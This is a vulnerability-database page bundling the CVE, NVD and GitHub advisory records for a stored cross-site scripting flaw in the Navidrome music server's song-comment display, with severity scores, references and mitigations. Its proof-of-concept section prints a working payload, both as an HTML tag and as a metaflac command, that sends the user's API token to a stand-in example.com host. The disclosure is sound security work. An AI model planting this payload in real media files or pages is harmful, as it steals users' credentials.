CVE-2026-25578 (GCVE-0-2026-25578)
Vulnerability from cvelistv5 – Published: 2026-02-04 21:58 – Updated: 2026-02-05 14:31
VLAI?
Title
Navidrome is vulnerable to XSS via comment from song metadata
Summary
Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials. This issue has been patched in version 0.60.0.
Severity ?
6.1 (Medium)
CWE
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-25578",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-05T14:20:04.926776Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-05T14:31:27.664Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "navidrome",
"vendor": "navidrome",
"versions": [
{
"status": "affected",
"version": "\u003c 0.60.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials. This issue has been patched in version 0.60.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-80",
"description": "CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-04T21:58:42.727Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w"
},
{
"name": "https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6"
},
{
"name": "https://github.com/navidrome/navidrome/releases/tag/v0.60.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/navidrome/navidrome/releases/tag/v0.60.0"
}
],
"source": {
"advisory": "GHSA-rh3r-8pxm-hg4w",
"discovery": "UNKNOWN"
},
"title": "Navidrome is vulnerable to XSS via comment from song metadata"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-25578",
"datePublished": "2026-02-04T21:58:42.727Z",
"dateReserved": "2026-02-03T01:02:46.714Z",
"dateUpdated": "2026-02-05T14:31:27.664Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-25578\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-04T22:16:01.107\",\"lastModified\":\"2026-02-18T19:03:44.243\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials. This issue has been patched in version 0.60.0.\"},{\"lang\":\"es\",\"value\":\"Navidrome es un servidor y streamer de colecci\u00f3n de m\u00fasica basado en web de c\u00f3digo abierto. Antes de la versi\u00f3n 0.60.0, una vulnerabilidad de cross-site scripting en el frontend permite a un atacante malicioso inyectar c\u00f3digo a trav\u00e9s de los metadatos de comentarios de una canci\u00f3n para exfiltrar credenciales de usuario. Este problema ha sido parcheado en la versi\u00f3n 0.60.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.8,\"impactScore\":4.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"},{\"lang\":\"en\",\"value\":\"CWE-80\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:navidrome:navidrome:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.60.0\",\"matchCriteriaId\":\"505C09F4-61BF-49C6-A089-5E2E8577E01B\"}]}]}],\"references\":[{\"url\":\"https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/navidrome/navidrome/releases/tag/v0.60.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25578\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-05T14:20:04.926776Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-05T14:20:05.728Z\"}}], \"cna\": {\"title\": \"Navidrome is vulnerable to XSS via comment from song metadata\", \"source\": {\"advisory\": \"GHSA-rh3r-8pxm-hg4w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.1, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"navidrome\", \"product\": \"navidrome\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.60.0\"}]}], \"references\": [{\"url\": \"https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w\", \"name\": \"https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6\", \"name\": \"https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/navidrome/navidrome/releases/tag/v0.60.0\", \"name\": \"https://github.com/navidrome/navidrome/releases/tag/v0.60.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials. This issue has been patched in version 0.60.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-80\", \"description\": \"CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-04T21:58:42.727Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-25578\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-05T14:31:27.664Z\", \"dateReserved\": \"2026-02-03T01:02:46.714Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-04T21:58:42.727Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-25578
Vulnerability from fkie_nvd - Published: 2026-02-04 22:16 - Updated: 2026-02-18 19:03
Severity ?
6.1 (Medium) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials. This issue has been patched in version 0.60.0.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:navidrome:navidrome:*:*:*:*:*:*:*:*",
"matchCriteriaId": "505C09F4-61BF-49C6-A089-5E2E8577E01B",
"versionEndExcluding": "0.60.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials. This issue has been patched in version 0.60.0."
},
{
"lang": "es",
"value": "Navidrome es un servidor y streamer de colecci\u00f3n de m\u00fasica basado en web de c\u00f3digo abierto. Antes de la versi\u00f3n 0.60.0, una vulnerabilidad de cross-site scripting en el frontend permite a un atacante malicioso inyectar c\u00f3digo a trav\u00e9s de los metadatos de comentarios de una canci\u00f3n para exfiltrar credenciales de usuario. Este problema ha sido parcheado en la versi\u00f3n 0.60.0."
}
],
"id": "CVE-2026-25578",
"lastModified": "2026-02-18T19:03:44.243",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-02-04T22:16:01.107",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Release Notes"
],
"url": "https://github.com/navidrome/navidrome/releases/tag/v0.60.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
},
{
"lang": "en",
"value": "CWE-80"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-RH3R-8PXM-HG4W
Vulnerability from github – Published: 2026-02-04 00:12 – Updated: 2026-02-05 00:37
VLAI?
Summary
Navidrome has XSS via comment from song metadata
Details
Summary
An XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.
An attacker's maliciously crafted song has to be added to Navidrome to exploit the vulnerability.
Details
The frontend is using React. In various places, the code uses the dangerouslySetInnerHTML escape hatch to set the content of an HTML element.
In some places, the value is first sanitized by removing anything looking like an HTML tag. In at least one place the value is used as is, thus leading to the XSS vulnerability.
In MultiLineTextField component, the input is split into lines and rendered through the dangerouslySetInnerHTML property.
<div
data-testid={`${source}.${idx}`}
key={md5(line + idx)}
dangerouslySetInnerHTML={{ __html: line }}
/>
This component is then used in the SongInfo and AlbumInfo components, when rendering the comment of the song or album. The contents of the comments field is taken verbatim from the metadata of a song, such as the VORBIS COMMENT comment of a FLAC file.
By crafting the contents of the comment field, an attacker can inject code into the frontend, which runs whenever a user views the song or album info.
Additionally, as the Navidrome API token is kept in local storage and since there's no CSP in place unless the user's configured one outside of Navidrome, the attacker can exfiltrate the API token.
PoC
- Modify the comment field of a song to contain the following payload using a tool like MusicBrain'z Picard:
<img src=x onerror="fetch(`https://example.com/c2c/${localStorage.getItem('token')}`)" />
or use metaflac:
echo '<img src=x onerror="fetch(`https://example.com/c2c/${localStorage.getItem('token')}`)" />' | metaflac --set-tag=comment=<(cat) file.flac
- Add the song to Navidrome
- Enter the "Songs" or one of the albums page, click the "kebab menu" and then "Get Info"
In this payload, a broken image can be seen in the info dialog.
In the developer tools' network inspector, the request exfiltrating the token to an example domain can be seen.
Impact
The vulnerability affects users of the Navidrome UI with songs from untrusted sources.
Mitigations
- Users of Navidrome should configure a strict [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP) in their reverse-proxy to make exfiltration more difficult
- Users of Navidrome should not index songs from untrusted sources without first vetting their metadata
Severity ?
6.1 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/navidrome/navidrome"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.60.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25578"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-80"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-04T00:12:20Z",
"nvd_published_at": "2026-02-04T22:16:01Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nAn XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.\n\nAn attacker\u0027s maliciously crafted song has to be added to Navidrome to exploit the vulnerability.\n\n### Details\n\nThe frontend is using React. In various places, the code uses the `dangerouslySetInnerHTML` escape hatch to set the content of an HTML element.\n\nIn some places, the value is first sanitized by removing anything looking like an HTML tag. In at least one place the value is used as is, thus leading to the XSS vulnerability.\n\nIn `MultiLineTextField` component, the input is split into lines and rendered through the `dangerouslySetInnerHTML` property. \n\n```js\n\u003cdiv\n data-testid={`${source}.${idx}`}\n key={md5(line + idx)}\n dangerouslySetInnerHTML={{ __html: line }}\n/\u003e\n```\n\nThis component is then used in the `SongInfo` and `AlbumInfo` components, when rendering the comment of the song or album. The contents of the comments field is taken verbatim from the metadata of a song, such as the VORBIS `COMMENT` comment of a FLAC file.\n\nBy crafting the contents of the comment field, an attacker can inject code into the frontend, which runs whenever a user views the song or album info.\n\nAdditionally, as the Navidrome API token is kept in local storage and since there\u0027s no CSP in place unless the user\u0027s configured one outside of Navidrome, the attacker can exfiltrate the API token.\n\n### PoC\n\n1. Modify the comment field of a song to contain the following payload using a tool like MusicBrain\u0027z Picard:\n\n```js\n\u003cimg src=x onerror=\"fetch(`https://example.com/c2c/${localStorage.getItem(\u0027token\u0027)}`)\" /\u003e\n```\n\nor use `metaflac`:\n\n```shell\necho \u0027\u003cimg src=x onerror=\"fetch(`https://example.com/c2c/${localStorage.getItem(\u0027token\u0027)}`)\" /\u003e\u0027 | metaflac --set-tag=comment=\u003c(cat) file.flac\n```\n\n2. Add the song to Navidrome\n3. Enter the \"Songs\" or one of the albums page, click the \"kebab menu\" and then \"Get Info\"\n\nIn this payload, a broken image can be seen in the info dialog.\n\n\u003cimg width=\"996\" height=\"660\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1467cdff-17b2-4dc6-9fb5-0a83c021ca04\" /\u003e\n\nIn the developer tools\u0027 network inspector, the request exfiltrating the token to an example domain can be seen.\n\n\u003cimg width=\"410\" height=\"34\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3f668797-63a6-4355-ae57-e95bde444143\" /\u003e\n\n\n### Impact\n\nThe vulnerability affects users of the Navidrome UI with songs from untrusted sources.\n\n### Mitigations\n\n- Users of Navidrome should configure a strict [[Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP) in their reverse-proxy to make exfiltration more difficult\n- Users of Navidrome should not index songs from untrusted sources without first vetting their metadata",
"id": "GHSA-rh3r-8pxm-hg4w",
"modified": "2026-02-05T00:37:01Z",
"published": "2026-02-04T00:12:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25578"
},
{
"type": "WEB",
"url": "https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6"
},
{
"type": "PACKAGE",
"url": "https://github.com/navidrome/navidrome"
},
{
"type": "WEB",
"url": "https://github.com/navidrome/navidrome/releases/tag/v0.60.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Navidrome has XSS via comment from song metadata"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…